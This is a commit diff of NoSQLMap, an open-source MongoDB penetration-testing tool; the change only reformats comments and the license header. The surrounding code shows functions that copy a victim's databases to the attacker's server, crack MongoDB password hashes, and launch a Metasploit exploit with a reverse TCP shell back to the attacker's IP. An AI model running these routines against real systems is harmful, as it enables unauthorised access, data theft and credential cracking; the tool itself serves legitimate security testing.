11#!/usr/bin/python
2- #NoSQLMap Copyright 2016 Russell Butturini
3- #This program is free software: you can redistribute it and/or modify
4- # it under the terms of the GNU General Public License as published by
5- #the Free Software Foundation, either version 3 of the License, or
6- #(at your option) any later version.
7-
8- #This program is distributed in the hope that it will be useful,
9- #but WITHOUT ANY WARRANTY; without even the implied warranty of
10- #MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
11- #GNU General Public License for more details.
12-
13- #You should have received a copy of the GNU General Public License
14- #along with this program. If not, see <http://www.gnu.org/licenses/>.
2+ # NoSQLMap Copyright 2012-2017 NoSQLMap Development team
3+ # See the file 'doc/COPYING' for copying permission
4+
155import pymongo
166import urllib
177import json
2212from hashlib import md5
2313import os
2414
15+
2516global yes_tag
2617global no_tag
2718yes_tag = ['y' , 'Y' ]
2819no_tag = ['n' , 'N' ]
2920
21+
3022def netAttacks (target , dbPort , myIP , myPort ):
3123 print "DB Access attacks (MongoDB)"
3224 print "================="
3325 mgtOpen = False
3426 webOpen = False
3527 mgtSelect = True
36- #This is a global for future use with other modules; may change
28+ # This is a global for future use with other modules; may change
3729 global dbList
3830 dbList = []
3931
@@ -70,7 +62,7 @@ def netAttacks(target, dbPort, myIP, myPort):
7062
7163
7264 mgtUrl = "http://" + target + ":28017"
73- #Future rev: Add web management interface parsing
65+ # Future rev: Add web management interface parsing
7466
7567 try :
7668 mgtRespCode = urllib .urlopen (mgtUrl ).getcode ()
@@ -138,6 +130,7 @@ def netAttacks(target, dbPort, myIP, myPort):
138130 if attack == "6" :
139131 return
140132
133+
141134def stealDBs (myDB ,victim ,mongoConn ):
142135 dbList = mongoConn .database_names ()
143136 dbLoot = True
@@ -161,7 +154,7 @@ def stealDBs(myDB,victim,mongoConn):
161154 break
162155
163156 try :
164- #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
157+ # Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
165158 dbNeedCreds = raw_input ("Does this database require credentials (y/n)? " )
166159 myDBConn = pymongo .MongoClient (myDB , 27017 )
167160 if dbNeedCreds in no_tag :
@@ -195,6 +188,7 @@ def stealDBs(myDB,victim,mongoConn):
195188 raw_input ("Something went wrong. Are you sure your MongoDB is running and options are set? Press enter to return..." )
196189 return
197190
191+
198192def passCrack (user , encPass ):
199193 select = True
200194 print "Select password cracking method: "
@@ -217,13 +211,15 @@ def passCrack (user, encPass):
217211 return
218212 return
219213
214+
220215def gen_pass (user , passw , hashVal ):
221216 if md5 (user + ":mongo:" + str (passw )).hexdigest () == hashVal :
222217 print "Found - " + user + ":" + passw
223218 return True
224219 else :
225220 return False
226221
222+
227223def dict_pass (user ,key ):
228224 loadCheck = False
229225
@@ -245,9 +241,11 @@ def dict_pass(user,key):
245241 break
246242 return
247243
244+
248245def genBrute (chars , maxLen ):
249246 return ('' .join (candidate ) for candidate in itertools .chain .from_iterable (itertools .product (chars , repeat = i ) for i in range (1 , maxLen + 1 )))
250247
248+
251249def brute_pass (user ,key ):
252250 charSel = True
253251 print "\n "
@@ -287,6 +285,7 @@ def brute_pass(user,key):
287285 break
288286 return
289287
288+
290289def getPlatInfo (mongoConn ):
291290 print "Server Info:"
292291 print "MongoDB Version: " + mongoConn .server_info ()['version' ]
@@ -295,6 +294,7 @@ def getPlatInfo (mongoConn):
295294 print "\n "
296295 return
297296
297+
298298def enumDbs (mongoConn ):
299299 try :
300300 print "List of databases:"
@@ -333,6 +333,7 @@ def enumDbs (mongoConn):
333333 print "\n "
334334 return
335335
336+
336337def msfLaunch ():
337338 try :
338339 proc = subprocess .call ("msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str (victim ) + " DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str (myIP ) + " LPORT=" + str (myPort ) + " E" , shell = True )
@@ -342,6 +343,7 @@ def msfLaunch():
342343 raw_input ("Press enter to continue..." )
343344 return
344345
346+
345347def enumGrid (mongoConn ):
346348 try :
347349 for dbItem in mongoConn .database_names ():
@@ -361,6 +363,7 @@ def enumGrid (mongoConn):
361363
362364 return
363365
366+
364367def mongoScan (ip ,port ,pingIt ):
365368
366369 if pingIt == True :
0 commit comments